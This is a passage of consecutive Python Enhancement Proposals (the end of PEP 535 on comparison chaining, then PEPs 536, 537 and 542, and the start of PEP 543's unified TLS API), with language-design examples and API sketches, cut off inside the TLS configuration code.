comparisons by returning suitably defined circuit breakers from comparison
operations.
The expansion of this logic to an arbitrary number of chained comparison
operations would be the same as the existing expansion for and.
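A rough pure-Python rendering of that dispatch for a single link in the chain is
sketched below (the names are illustrative only; the real change would happen in
the compiler's expansion of chained comparisons, and the right-hand comparison is
passed as a zero-argument callable to preserve laziness):
def chain_link(lhs_result, rhs_thunk):
    cb_type = type(lhs_result)
    if hasattr(cb_type, "__else__"):
        # Proposed behaviour: "lhs_result else rhs"
        if lhs_result:
            then_hook = getattr(cb_type, "__then__", None)
            return then_hook(lhs_result, lhs_result) if then_hook else lhs_result
        return cb_type.__else__(lhs_result, rhs_thunk())
    # Existing behaviour: "lhs_result and rhs"
    return lhs_result and rhs_thunk()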
Rationale
In ultimately rejecting PEP 335, Guido van Rossum noted [1]:
The NumPy folks brought up a somewhat separate issue: for them,
the most common use case is chained comparisons (e.g. A < B < C).
To understand this observation, we first need to look at how comparisons work
with NumPy arrays:
>>> import numpy as np
>>> increasing = np.arange(5)
>>> increasing
array([0, 1, 2, 3, 4])
>>> decreasing = np.arange(4, -1, -1)
>>> decreasing
array([4, 3, 2, 1, 0])
>>> increasing < decreasing
array([ True, True, False, False, False], dtype=bool)
Here we see that NumPy array comparisons are element-wise by default, comparing
each element in the left hand array to the corresponding element in the right
hand array, and producing a matrix of boolean results.
If either side of the comparison is a scalar value, then it is broadcast across
the array and compared to each individual element:
>>> 0 < increasing
array([False, True, True, True, True], dtype=bool)
>>> increasing < 4
array([ True, True, True, True, False], dtype=bool)
However, this broadcasting idiom breaks down if we attempt to use chained
comparisons:
>>> 0 < increasing < 4
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
The problem is that internally, Python implicitly expands this chained
comparison into the form:
>>> 0 < increasing and increasing < 4
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
And NumPy only permits implicit coercion to a boolean value for single-element
arrays where a.any() and a.all() can be assured of having the same
result:
>>> np.array([False]) and np.array([False])
array([False], dtype=bool)
>>> np.array([False]) and np.array([True])
array([False], dtype=bool)
>>> np.array([True]) and np.array([False])
array([False], dtype=bool)
>>> np.array([True]) and np.array([True])
array([ True], dtype=bool)
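For reference, the workaround NumPy users typically write by hand today relies on
the bitwise & operator, which NumPy overloads for element-wise conjunction and
which sidesteps the chaining problem entirely:
>>> (0 < increasing) & (increasing < 4)
array([False,  True,  True,  True, False], dtype=bool)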
The proposal in this PEP would allow this situation to be changed by updating
the definition of element-wise comparison operations in NumPy to return a
dedicated subclass that implements the new circuit breaking protocol and also
changes the result array’s interpretation in a boolean context to always
return False and hence never trigger the short-circuiting behaviour:
class ComparisonResultArray(np.ndarray):
    def __bool__(self):
        # Element-wise comparison chaining never short-circuits
        return False
    def _raise_NotImplementedError(self):
        msg = ("Comparison array truth values are ambiguous outside "
               "chained comparisons. Use a.any() or a.all()")
        raise NotImplementedError(msg)
    def __not__(self):
        self._raise_NotImplementedError()
    def __then__(self, result):
        self._raise_NotImplementedError()
    def __else__(self, result):
        return np.logical_and(self, result.view(ComparisonResultArray))
With this change, the chained comparison example above would be able to return:
>>> 0 < increasing < 4
ComparisonResultArray([ False, True, True, True, False], dtype=bool)
Implementation
Actual implementation has been deferred pending in-principle interest in the
idea of making the changes proposed in PEP 532.
…TBD…
References
[1]
PEP 335 rejection notification
(https://mail.python.org/pipermail/python-dev/2012-March/117510.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
| Deferred | PEP 535 – Rich comparison chaining | Standards Track | Inspired by PEP 335, and building on the circuit breaking protocol described
in PEP 532, this PEP proposes a change to the definition of chained comparisons,
where the comparison chaining will be updated to use the left-associative
circuit breaking operator (else) rather than the logical conjunction
operator (and) if the left hand comparison returns a circuit breaker as
its result. |
PEP 536 – Final Grammar for Literal String Interpolation
Author:
Philipp Angerer <phil.angerer at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
11-Dec-2016
Python-Version:
3.7
Post-History:
18-Aug-2016,
23-Dec-2016,
15-Mar-2019
Resolution:
Discourse message
Table of Contents
Abstract
PEP Withdrawal
Terminology
Motivation
Rationale
Specification
Backwards Compatibility
Reference Implementation
References
Copyright
Abstract
PEP 498 introduced Literal String Interpolation (or “f-strings”).
The expression portions of those literals however are subject to
certain restrictions. This PEP proposes a formal grammar lifting
those restrictions, promoting “f-strings” to “f expressions” or f-literals.
This PEP expands upon the f-strings introduced by PEP 498,
so this text requires familiarity with PEP 498.
PEP Withdrawal
This PEP has been withdrawn in favour of PEP 701.
PEP 701 addresses all important points of this PEP.
Terminology
This text will refer to the existing grammar as “f-strings”,
and the proposed one as “f-literals”.
Furthermore, it will refer to the {}-delimited expressions in
f-literals/f-strings as “expression portions” and the static string content
around them as “string portions”.
Motivation
The current implementation of f-strings in CPython relies on the existing
string parsing machinery and post-processing of its tokens. This results in
several restrictions on the expressions usable within f-strings:
It is impossible to use the quote character delimiting the f-string
within the expression portion:
>>> f'Magic wand: { bag['wand'] }'
                         ^
SyntaxError: invalid syntax
A previously considered way around it would lead to escape sequences
in executed code and is prohibited in f-strings:
>>> f'Magic wand { bag[\'wand\'] } string'
SyntaxError: f-string expression portion cannot include a backslash
Comments are forbidden even in multi-line f-strings:
>>> f'''A complex trick: {
...     bag['bag']  # recursive bags!
... }'''
SyntaxError: f-string expression part cannot include '#'
Expression portions need to wrap ':' and '!' in braces:
>>> f'Useless use of lambdas: { lambda x: x*2 }'
SyntaxError: unexpected EOF while parsing
These limitations serve no purpose from a language user perspective and
can be lifted by giving f-literals a regular grammar without exceptions
and implementing it using dedicated parse code.
Rationale
The restrictions mentioned in Motivation are non-obvious and counter-intuitive
unless the user is familiar with the f-literals’ implementation details.
As mentioned, a previous version of PEP 498 allowed escape sequences
anywhere in f-strings, including as ways to encode the braces delimiting
the expression portions and in their code. They would be expanded before
the code is parsed, which would have had several important ramifications:
1. It would not be clear to human readers which portions are expressions
and which are strings. Great material for an “obfuscated/underhanded
Python challenge”.
2. Syntax highlighters are good at parsing nested grammar, but not
at recognizing escape sequences. ECMAScript 2016 (JavaScript) allows
escape sequences in its identifiers [1] and the author knows of no
syntax highlighter able to correctly highlight code making use of this.
As a consequence, the expression portions would be harder to recognize
with and without the aid of syntax highlighting. With the new grammar,
it is easy to extend syntax highlighters to correctly parse
and display f-literals:
f'Magic wand: {bag['wand']:^10}'
Highlighting expression portions with possible escape sequences would
mean creating a modified copy of all rules of the complete expression
grammar, accounting for the possibility of escape sequences in key words,
delimiters, and all other language syntax. One such duplication would
yield one level of escaping depth and have to be repeated for a deeper
escaping in a recursive f-literal. This is the case since no highlighting
engine known to the author supports expanding escape sequences before
applying rules to a certain context. Nesting contexts however is a
standard feature of all highlighting engines.
Familiarity also plays a role: Arbitrary nesting of expressions
without expansion of escape sequences is available in every single
other language employing a string interpolation method that uses
expressions instead of just variable names. [2]
Specification
PEP 498 specified f-strings as the following, but placed restrictions on them:
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
All restrictions mentioned in the PEP are lifted from f-literals,
as explained below:
Expression portions may now contain strings delimited with the same
kind of quote that is used to delimit the f-literal.
Backslashes may now appear within expressions just like anywhere else
in Python code. In case of strings nested within f-literals,
escape sequences are expanded when the innermost string is evaluated.
Comments, using the '#' character, are possible only in multi-line
f-literals, since comments are terminated by the end of the line
(which makes closing a single-line f-literal impossible).
Expression portions may contain ':' or '!' wherever
syntactically valid. The first ':' or '!' that is not part
of an expression has to be followed by a valid coercion or format specifier.
A remaining restriction not explicitly mentioned by PEP 498 is line breaks
in expression portions. Since strings delimited by single ' or "
characters are expected to be single line, line breaks remain illegal
in expression portions of single line strings.
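For illustration only (these snippets are not part of the PEP; they simply assume the proposed grammar is available, as it eventually became through PEP 701), the failing examples from the Motivation section would become valid f-literals:
>>> bag = {'wand': 'elder wand'}
>>> f'Magic wand: { bag['wand'] }'
'Magic wand: elder wand'
>>> f'''A complex trick: {
...     bag['wand']  # comments allowed in multi-line f-literals
... }'''
'A complex trick: elder wand'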
Note
Is lifting of the restrictions sufficient,
or should we specify a more complete grammar?
Backwards Compatibility
f-literals are fully backwards compatible with f-strings,
and only expand the syntax considered legal.
Reference Implementation
TBD
References
[1]
ECMAScript IdentifierName specification
( http://ecma-international.org/ecma-262/6.0/#sec-names-and-keywords )
Yes, const cthulhu = { H̹̙̦̮͉̩̗̗ͧ̇̏̊̾Eͨ͆͒̆ͮ̃͏̷̮̣̫̤̣Cͯ̂͐͏̨̛͔̦̟͈̻O̜͎͍͙͚̬̝̣̽ͮ͐͗̀ͤ̍̀͢M̴̡̲̭͍͇̼̟̯̦̉̒͠Ḛ̛̙̞̪̗ͥͤͩ̾͑̔͐ͅṮ̴̷̷̗̼͍̿̿̓̽͐H̙̙̔̄͜\u0042: 42 } is valid ECMAScript 2016
[2]
Wikipedia article on string interpolation
( https://en.wikipedia.org/wiki/String_interpolation )
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 536 – Final Grammar for Literal String Interpolation | Standards Track | PEP 498 introduced Literal String Interpolation (or “f-strings”).
The expression portions of those literals however are subject to
certain restrictions. This PEP proposes a formal grammar lifting
those restrictions, promoting “f-strings” to “f expressions” or f-literals. |
PEP 537 – Python 3.7 Release Schedule
Author:
Ned Deily <nad at python.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
23-Dec-2016
Python-Version:
3.7
Table of Contents
Abstract
Release Manager and Crew
3.7 Lifespan
Release Schedule
3.7.0 schedule
3.7.1 schedule (first bugfix release)
3.7.2 schedule
3.7.3 schedule
3.7.4 schedule
3.7.5 schedule
3.7.6 schedule
3.7.7 schedule
3.7.8 schedule (last bugfix release)
3.7.9 schedule (security/binary release)
3.7.10 schedule
3.7.11 schedule
3.7.12 schedule
3.7.13 schedule
3.7.14 schedule
3.7.15 schedule
3.7.16 schedule
3.7.17 schedule (last security-only release)
Features for 3.7
Copyright
Abstract
This document describes the development and release schedule for
Python 3.7. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.7 Release Manager: Ned Deily
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
3.7 Lifespan
3.7 will receive bugfix updates
approximately every 3 months for about 24 months. Sometime after the release of
3.8.0 final, a final 3.7 bugfix update will be released.
After that, it is expected that
security updates
(source only) will be released as needed until 5 years after
the release of 3.7 final, so until approximately 2023-06.
As of 2023-06-27, 3.7 has reached the
end-of-life phase
of its release cycle. 3.7.17 was the final security release. The code base for
3.7 is now frozen; no further updates will be provided, nor will issues of any
kind be accepted on the bug tracker.
Release Schedule
3.7.0 schedule
3.7 development begins: 2016-09-12
3.7.0 alpha 1: 2017-09-19
3.7.0 alpha 2: 2017-10-17
3.7.0 alpha 3: 2017-12-05
3.7.0 alpha 4: 2018-01-09
3.7.0 beta 1: 2018-01-31
(No new features beyond this point.)
3.7.0 beta 2: 2018-02-27
3.7.0 beta 3: 2018-03-29
3.7.0 beta 4: 2018-05-02
3.7.0 beta 5: 2018-05-30
3.7.0 candidate 1: 2018-06-12
3.7.0 final: 2018-06-27
3.7.1 schedule (first bugfix release)
3.7.1 candidate 1: 2018-09-26
3.7.1 candidate 2: 2018-10-13
3.7.1 final: 2018-10-20
3.7.2 schedule
3.7.2 candidate 1: 2018-12-11
3.7.2 final: 2018-12-24
3.7.3 schedule
3.7.3 candidate 1: 2019-03-12
3.7.3 final: 2019-03-25
3.7.4 schedule
3.7.4 candidate 1: 2019-06-18
3.7.4 candidate 2: 2019-07-02
3.7.4 final: 2019-07-08
3.7.5 schedule
3.7.5 candidate 1: 2019-10-02
3.7.5 final: 2019-10-15
3.7.6 schedule
3.7.6 candidate 1: 2019-12-11
3.7.6 final: 2019-12-18
3.7.7 schedule
3.7.7 candidate 1: 2020-03-04
3.7.7 final: 2020-03-10
3.7.8 schedule (last bugfix release)
Last planned release of binaries
3.7.8 candidate 1: 2020-06-15
3.7.8 final: 2020-06-27
3.7.9 schedule (security/binary release)
Security fixes plus updated binary installers
to address 3.7.8 issues; no further binary
releases are planned.
3.7.9 final: 2020-08-17
3.7.10 schedule
3.7.10 final: 2021-02-15
3.7.11 schedule
3.7.11 final: 2021-06-28
3.7.12 schedule
3.7.12 final: 2021-09-04
3.7.13 schedule
3.7.13 final: 2022-03-16
3.7.14 schedule
3.7.14 final: 2022-09-06
3.7.15 schedule
3.7.15 final: 2022-10-11
3.7.16 schedule
3.7.16 final: 2022-12-06
3.7.17 schedule (last security-only release)
3.7.17 final: 2023-06-06
Features for 3.7
Implemented PEPs for 3.7 (as of 3.7.0 beta 1):
PEP 538, Coercing the legacy C locale to a UTF-8 based locale
PEP 539, A New C-API for Thread-Local Storage in CPython
PEP 540, UTF-8 mode
PEP 552, Deterministic pyc
PEP 553, Built-in breakpoint()
PEP 557, Data Classes
PEP 560, Core support for typing module and generic types
PEP 562, Module __getattr__ and __dir__
PEP 563, Postponed Evaluation of Annotations
PEP 564, Time functions with nanosecond resolution
PEP 565, Show DeprecationWarning in __main__
PEP 567, Context Variables
Copyright
This document has been placed in the public domain.
| Final | PEP 537 – Python 3.7 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.7. The schedule primarily concerns itself with PEP-sized
items. |
PEP 542 – Dot Notation Assignment In Function Header
Author:
Markus Meskanen <markusmeskanen at gmail.com>
Status:
Rejected
Type:
Standards Track
Created:
10-Feb-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Backwards Compatibility
Copyright
Abstract
Function definitions only allow simple function names to be used,
even though functions are assignable first class objects.
This PEP proposes adding support for assigning a function to
a class or instance attribute directly in the function
definition’s header by using the dot notation to separate
the object from the function’s name.
Although it would be a similar feature, this PEP does not address general
assignment to anything that supports assignment, such as dict keys
and list indexes.
Rationale
Currently if a function needs to be assigned to a class or instance
attribute, it requires an additional assignment statement to be made:
class MyClass:
    ...
my_instance = MyClass()
def my_function(self):
    ...
# Assign to class attribute
MyClass.my_function = my_function
# Or assign to instance attribute
my_instance.my_function = my_function
While this isn’t usually an inconvenience, using dot notation to
assign directly in the function’s header would greatly simplify this:
class MyClass:
    ...
my_instance = MyClass()
# Assign to class attribute
def MyClass.my_function(self):
    ...
# Or assign to instance attribute
def my_instance.my_function(self):
    ...
There are multiple reasons to use this functionality over
a standard class method, for example when the class is referenced
inside the function’s header (such as with decorators and typing).
This is also useful when an instance requires a callback attribute:
class Menu:
    def __init__(self, items=None, select_callback=None):
        self.items = items if items is not None else []
        self.select_callback = select_callback
my_menu = Menu([item1, item2])
def my_menu.select_callback(item_index, menu):
    print(menu.items[item_index])
As opposed to:
my_menu = Menu([item1, item2])
def select_callback(item_index, menu):
    print(menu.items[item_index])
my_menu.select_callback = select_callback
Or defining them in an “unnatural” order:
def select_callback(item_index, menu):
    print(menu.items[item_index])
my_menu = Menu([item1, item2], select_callback)
It reads better than the “unnatural” way, since you already know at
the time of the function definition what it's going to be used for.
It also saves one line of code while removing visual complexity.
The feature would also avoid leaking the function’s name into
the global namespace:
eggs = 'something'
def Spam.eggs(self):
    ...
def Cheese.eggs(self):
    ...
assert eggs == 'something'
Ideally this would be just syntactic sugar:
def x.y():
    ...
# Equals to
def y():
    ...
x.y = y
Similar to how decorators are syntactic sugar:
@decorate
def f():
    ...
# Equals to
def f():
    ...
f = decorate(f)
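For comparison only (this helper is not part of the PEP; the name assign_to is invented), a rough approximation of the proposed behaviour is possible today with exactly such a decorator, although unlike the proposal it still leaves the function's name in the enclosing namespace:
def assign_to(obj):
    # Illustrative decorator: binds the decorated function onto ``obj``
    # under the function's own name, mimicking ``def obj.name(...)``.
    def decorator(func):
        setattr(obj, func.__name__, func)
        return func
    return decorator
@assign_to(my_menu)
def select_callback(item_index, menu):
    print(menu.items[item_index])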
Implementation
The __name__ would follow the principles of a normal function:
class MyClass:
    def my_function1(self):
        ...
def MyClass.my_function2(self):
    ...
assert MyClass.my_function1.__name__ == 'my_function1'
assert MyClass.my_function2.__name__ == 'my_function2'
The grammar would use dotted_name to support chaining of attributes:
def Person.name.fset(self, value):
    self._name = value
Backwards Compatibility
This PEP is fully backwards compatible.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 542 – Dot Notation Assignment In Function Header | Standards Track | Function definitions only allow simple function names to be used,
even though functions are assignable first class objects. |
PEP 543 – A Unified TLS API for Python
Author:
Cory Benfield <cory at lukasa.co.uk>,
Christian Heimes <christian at python.org>
Status:
Withdrawn
Type:
Standards Track
Created:
17-Oct-2016
Python-Version:
3.7
Post-History:
11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017
Table of Contents
Abstract
Resolution
Rationale
Problems
Proposal
Interfaces
Configuration
Context
Buffer
Socket
Cipher Suites
OpenSSL
SecureTransport
SChannel
Network Security Services (NSS)
Proposed Interface
Protocol Negotiation
TLS Versions
Errors
Certificates
Private Keys
Trust Store
Runtime Access
Changes to the Standard Library
Migration of the ssl module
Future
Credits
Copyright
Abstract
This PEP would define a standard TLS interface in the form of a collection of
abstract base classes. This interface would allow Python implementations and
third-party libraries to provide bindings to TLS libraries other than OpenSSL
that can be used by tools that expect the interface provided by the Python
standard library, with the goal of reducing the dependence of the Python
ecosystem on OpenSSL.
Resolution
2020-06-25: With contemporary agreement with one author, and past
agreement with another, this PEP is withdrawn due to changes in the
APIs of the underlying operating systems.
Rationale
In the 21st century it has become increasingly clear that robust and
user-friendly TLS support is an extremely important part of the ecosystem of
any popular programming language. For most of its lifetime, this role in the
Python ecosystem has primarily been served by the ssl module, which provides
a Python API to the OpenSSL library.
Because the ssl module is distributed with the Python standard library, it
has become the overwhelmingly most-popular method for handling TLS in Python.
An extraordinary majority of Python libraries, both in the standard library and
on the Python Package Index, rely on the ssl module for their TLS
connectivity.
Unfortunately, the preeminence of the ssl module has had a number of
unforeseen side-effects that have had the effect of tying the entire Python
ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even
in situations where it may provide a worse user experience than alternative TLS
implementations, which imposes a cognitive burden and makes it hard to provide
“platform-native” experiences.
Problems
The fact that the ssl module is built into the standard library has meant
that all standard-library Python networking libraries are entirely reliant on
the OpenSSL that the Python implementation has been linked against. This
leads to the following issues:
It is difficult to take advantage of new, higher-security TLS without
recompiling Python to get a new OpenSSL. While there are third-party bindings
to OpenSSL (e.g. pyOpenSSL), these need to be shimmed into a format that
the standard library understands, forcing projects that want to use them to
maintain substantial compatibility layers.
Windows distributions of Python need to be shipped with a copy of
OpenSSL. This puts the CPython development team in the position of being
OpenSSL redistributors, potentially needing to ship security updates to the
Windows Python distributions when OpenSSL vulnerabilities are released.
macOS distributions of Python need either to be shipped with a copy
of OpenSSL or linked against the system OpenSSL library. Apple has formally
deprecated linking against the system OpenSSL library, and even if they had
not, that library version has been unsupported by upstream for nearly one
year as of the time of writing. The CPython development team has started
shipping newer OpenSSLs with the Python available from python.org, but this
has the same problem as with Windows.
Many systems, including but not limited to Windows and macOS, do not make
their system certificate stores available to OpenSSL. This forces users to
either obtain their trust roots from elsewhere (e.g. certifi) or to
attempt to export their system trust stores in some form.
Relying on certifi is less than ideal, as most system administrators do
not expect to receive security-critical software updates from PyPI.
Additionally, it is not easy to extend the certifi trust bundle to include
custom roots, or to centrally manage trust using the certifi model.
Even in situations where the system certificate stores are made available to
OpenSSL in some form, the experience is still sub-standard, as OpenSSL will
perform different validation checks than the platform-native TLS
implementation. This can lead to users experiencing different behaviour on
their browsers or other platform-native tools than they experience in Python,
with little or no recourse to resolve the problem.
Users may wish to integrate with TLS libraries other than OpenSSL for many
other reasons, such as OpenSSL missing features (e.g. TLS 1.3 support), or
because OpenSSL is simply too large and unwieldy for the platform (e.g. for
embedded Python). Those users are left with the requirement to use
third-party networking libraries that can interact with their preferred TLS
library or to shim their preferred library into the OpenSSL-specific ssl
module API.
Additionally, the ssl module as implemented today limits the ability of
CPython itself to add support for alternative TLS backends, or remove OpenSSL
support entirely, should either of these become necessary or useful. The
ssl module exposes too many OpenSSL-specific function calls and features to
easily map to an alternative TLS backend.
Proposal
This PEP proposes to introduce a few new Abstract Base Classes in Python 3.7 to
provide TLS functionality that is not so strongly tied to OpenSSL. It also
proposes to update standard library modules to use only the interface exposed
by these abstract base classes wherever possible. There are three goals here:
To provide a common API surface for both core and third-party developers to
target their TLS implementations to. This allows TLS developers to provide
interfaces that can be used by most Python code, and allows network
developers to have an interface that they can target that will work with a
wide range of TLS implementations.
To provide an API that lets few or no OpenSSL-specific concepts leak through.
The ssl module today has a number of warts caused by leaking OpenSSL
concepts through to the API: the new ABCs would remove those specific
concepts.
To provide a path for the core development team to make OpenSSL one of many
possible TLS backends, rather than requiring that it be present on a system
in order for Python to have TLS support.
The proposed interface is laid out below.
Interfaces
There are several interfaces that require standardisation. Those interfaces
are:
Configuring TLS, currently implemented by the SSLContext class in the
ssl module.
Providing an in-memory buffer for doing in-memory encryption or decryption
with no actual I/O (necessary for asynchronous I/O models), currently
implemented by the SSLObject class in the ssl module.
Wrapping a socket object, currently implemented by the SSLSocket class
in the ssl module.
Applying TLS configuration to the wrapping objects in (2) and (3). Currently
this is also implemented by the SSLContext class in the ssl module.
Specifying TLS cipher suites. There is currently no code for doing this in
the standard library: instead, the standard library uses OpenSSL cipher
suite strings.
Specifying application-layer protocols that can be negotiated during the
TLS handshake.
Specifying TLS versions.
Reporting errors to the caller, currently implemented by the SSLError
class in the ssl module.
Specifying certificates to load, either as client or server certificates.
Specifying which trust database should be used to validate certificates
presented by a remote peer.
Finding a way to get hold of these interfaces at run time.
For the sake of simplicity, this PEP proposes to take a unified approach to
(2) and (3) (that is, buffers and sockets). The Python socket API is a
sizeable one, and implementing a wrapped socket that has the same behaviour as
a regular Python socket is a subtle and tricky thing to do. However, it is
entirely possible to implement a generic wrapped socket in terms of wrapped
buffers: that is, it is possible to write a wrapped socket (3) that will work
for any implementation that provides (2). For this reason, this PEP proposes to
provide an ABC for wrapped buffers (2) but a concrete class for wrapped sockets
(3).
This decision has the effect of making it impossible to bind a small number of
TLS libraries to this ABC, because those TLS libraries cannot provide a
wrapped buffer implementation. The most notable of these at this time appears
to be Amazon’s s2n, which currently does not provide an I/O abstraction
layer. However, even this library’s developers consider this a missing feature and are
working to add it. For this reason, it is safe to assume that a concrete
implementation of (3) in terms of (2) will be a substantial effort-saving
device and a great tool for correctness. Therefore, this PEP proposes doing
just that.
Obviously, (5) doesn’t require an abstract base class: instead, it requires a
richer API for configuring supported cipher suites that can be easily updated
with supported cipher suites for different implementations.
(9) is a thorny problem, because in an ideal world the private keys associated
with these certificates would never end up in-memory in the Python process
(that is, the TLS library would collaborate with a Hardware Security Module
(HSM) to provide the private key in such a way that it cannot be extracted from
process memory). Thus, we need to provide an extensible model of providing
certificates that allows concrete implementations the ability to provide this
higher level of security, while also allowing a lower bar for those
implementations that cannot. This lower bar would be the same as the status
quo: that is, the certificate may be loaded from an in-memory buffer or from a
file on disk.
(10) also represents an issue because different TLS implementations vary wildly
in how they allow users to select trust stores. Some implementations have
specific trust store formats that only they can use (such as the OpenSSL CA
directory format that is created by c_rehash), and others may not allow you
to specify a trust store that does not include their default trust store.
For this reason, we need to provide a model that assumes very little about the
form that trust stores take. The “Trust Store” section below goes into more
detail about how this is achieved.
Finally, this API will split the responsibilities currently assumed by the
SSLContext object: specifically, the responsibility for holding and managing
configuration and the responsibility for using that configuration to build
wrapper objects.
This is necessary primarily for supporting functionality like Server Name
Indication (SNI). In OpenSSL (and thus in the ssl module), the server has
the ability to modify the TLS configuration in response to the client telling
the server what hostname it is trying to reach. This is mostly used to change
certificate chain so as to present the correct TLS certificate chain for the
given hostname. The specific mechanism by which this is done is by returning
a new SSLContext object with the appropriate configuration.
This is not a model that maps well to other TLS implementations. Instead, we
need to make it possible to provide a return value from the SNI callback that
can be used to indicate what configuration changes should be made. This means
providing an object that can hold TLS configuration. This object needs to be
applied to specific TLSWrappedBuffer and TLSWrappedSocket objects.
For this reason, we split the responsibility of SSLContext into two separate
objects. The TLSConfiguration object is an object that acts as container
for TLS configuration: the ClientContext and ServerContext objects are
objects that are instantiated with a TLSConfiguration object. All three
objects would be immutable.
Note
The following API declarations uniformly use type hints to aid
reading. Some of these type hints cannot actually be used in practice
because they are circularly referential. Consider them more a
guideline than a reflection of the final code in the module.
Configuration
The TLSConfiguration concrete class defines an object that can hold and
manage TLS configuration. The goals of this class are as follows:
To provide a method of specifying TLS configuration that avoids the risk of
errors in typing (this excludes the use of a simple dictionary).
To provide an object that can be safely compared to other configuration
objects to detect changes in TLS configuration, for use with the SNI
callback.
This class is not an ABC, primarily because it is not expected to have
implementation-specific behaviour. The responsibility for transforming a
TLSConfiguration object into a useful set of configuration for a given TLS
implementation belongs to the Context objects discussed below.
This class has one other notable property: it is immutable. This is a desirable
trait for a few reasons. The most important one is that it allows these objects
to be used as dictionary keys, which is potentially extremely valuable for
certain TLS backends and their SNI configuration. On top of this, it frees
implementations from needing to worry about their configuration objects being
changed under their feet, which allows them to avoid needing to carefully
synchronize changes between their concrete data structures and the
configuration object.
This object is extendable: that is, future releases of Python may add
configuration fields to this object as they become useful. For
backwards-compatibility purposes, new fields are only appended to this object.
Existing fields will never be removed, renamed, or reordered.
The TLSConfiguration object would be defined by the following code:
ServerNameCallback = Callable[[TLSBufferObject, Optional[str], TLSConfiguration], Any]
_configuration_fields = [
'validate_certificates',
'certificate_chain',
'ciphers',
'inner_protocols',
'lowest_supported_version',
'highest_supported_version',
'trust_store',
'sni_callback',
]
_DEFAULT_VALUE = object()
class TLSConfiguration(namedtuple('TLSConfiguration', _configuration_fields)):
"""
An immutable TLS Configuration object. This object has the following
properties:
:param validate_certificates bool: Whether to validate the TLS
certificates. This switch operates at a very broad scope: either
validation is enabled, in which case all forms of validation are
performed including hostname validation if possible, or validation
is disabled, in which case no validation is performed.
Not all backends support having their certificate validation
disabled. If a backend does not support having their certificate
validation disabled, attempting to set this property to ``False``
will throw a ``TLSError`` when this object is passed into a
context object.
:param certificate_chain Tuple[Tuple[Certificate],PrivateKey]: The
certificate, intermediate certificate, and the corresponding
private key for the leaf certificate. These certificates will be
offered to the remote peer during the handshake if required.
The first Certificate in the list must be the leaf certificate. All
subsequent certificates will be offered as intermediate additional
certificates.
:param ciphers Tuple[Union[CipherSuite, int]]:
The available ciphers for TLS connections created with this
configuration, in priority order.
:param inner_protocols Tuple[Union[NextProtocol, bytes]]:
Protocols that connections created with this configuration should
advertise as supported during the TLS handshake. These may be
advertised using either or both of ALPN or NPN. This list of
protocols should be ordered by preference.
:param lowest_supported_version TLSVersion:
The minimum version of TLS that should be allowed on TLS
connections using this configuration.
:param highest_supported_version TLSVersion:
The maximum version of TLS that should be allowed on TLS
connections using this configuration.
:param trust_store TrustStore:
The trust store that connections using this configuration will use
to validate certificates.
:param sni_callback Optional[ServerNameCallback]:
A callback function that will be called after the TLS Client Hello
handshake message has been received by the TLS server when the TLS
client specifies a server name indication.
Only one callback can be set per ``TLSConfiguration``. If the
``sni_callback`` is ``None`` then the callback is disabled. If the
``TLSConfiguration`` is used for a ``ClientContext`` then this
setting will be ignored.
The ``callback`` function will be called with three arguments: the
first will be the ``TLSBufferObject`` for the connection; the
second will be a string that represents the server name that the
client is intending to communicate (or ``None`` if the TLS Client
Hello does not contain a server name); and the third argument will
be the original ``TLSConfiguration`` that configured the
connection. The server name argument will be the IDNA *decoded*
server name.
The ``callback`` must return a ``TLSConfiguration`` to allow
negotiation to continue. Other return values signal errors.
Attempting to control what error is signaled by the underlying TLS
implementation is not specified in this API, but is up to the
concrete implementation to handle.
The Context will do its best to apply the ``TLSConfiguration``
changes from its original configuration to the incoming connection.
This will usually include changing the certificate chain, but may
also include changes to allowable ciphers or any other
configuration settings.
"""
    __slots__ = ()

    def __new__(cls, validate_certificates: Optional[bool] = None,
                certificate_chain: Optional[Tuple[Tuple[Certificate], PrivateKey]] = None,
                ciphers: Optional[Tuple[Union[CipherSuite, int]]] = None,
                inner_protocols: Optional[Tuple[Union[NextProtocol, bytes]]] = None,
                lowest_supported_version: Optional[TLSVersion] = None,
                highest_supported_version: Optional[TLSVersion] = None,
                trust_store: Optional[TrustStore] = None,
                sni_callback: Optional[ServerNameCallback] = None):
        if validate_certificates is None:
            validate_certificates = True
        if ciphers is None:
            ciphers = DEFAULT_CIPHER_LIST
        if inner_protocols is None:
            inner_protocols = []
        if lowest_supported_version is None:
            lowest_supported_version = TLSVersion.TLSv1
        if highest_supported_version is None:
            highest_supported_version = TLSVersion.MAXIMUM_SUPPORTED

        return super().__new__(
            cls, validate_certificates, certificate_chain, ciphers,
            inner_protocols, lowest_supported_version,
            highest_supported_version, trust_store, sni_callback
        )

    def update(self, validate_certificates=_DEFAULT_VALUE,
               certificate_chain=_DEFAULT_VALUE,
               ciphers=_DEFAULT_VALUE,
               inner_protocols=_DEFAULT_VALUE,
               lowest_supported_version=_DEFAULT_VALUE,
               highest_supported_version=_DEFAULT_VALUE,
               trust_store=_DEFAULT_VALUE,
               sni_callback=_DEFAULT_VALUE):
        """
        Create a new ``TLSConfiguration``, overriding some of the settings
        on the original configuration with the new settings.
        """
        if validate_certificates is _DEFAULT_VALUE:
            validate_certificates = self.validate_certificates
        if certificate_chain is _DEFAULT_VALUE:
            certificate_chain = self.certificate_chain
        if ciphers is _DEFAULT_VALUE:
            ciphers = self.ciphers
        if inner_protocols is _DEFAULT_VALUE:
            inner_protocols = self.inner_protocols
        if lowest_supported_version is _DEFAULT_VALUE:
            lowest_supported_version = self.lowest_supported_version
        if highest_supported_version is _DEFAULT_VALUE:
            highest_supported_version = self.highest_supported_version
        if trust_store is _DEFAULT_VALUE:
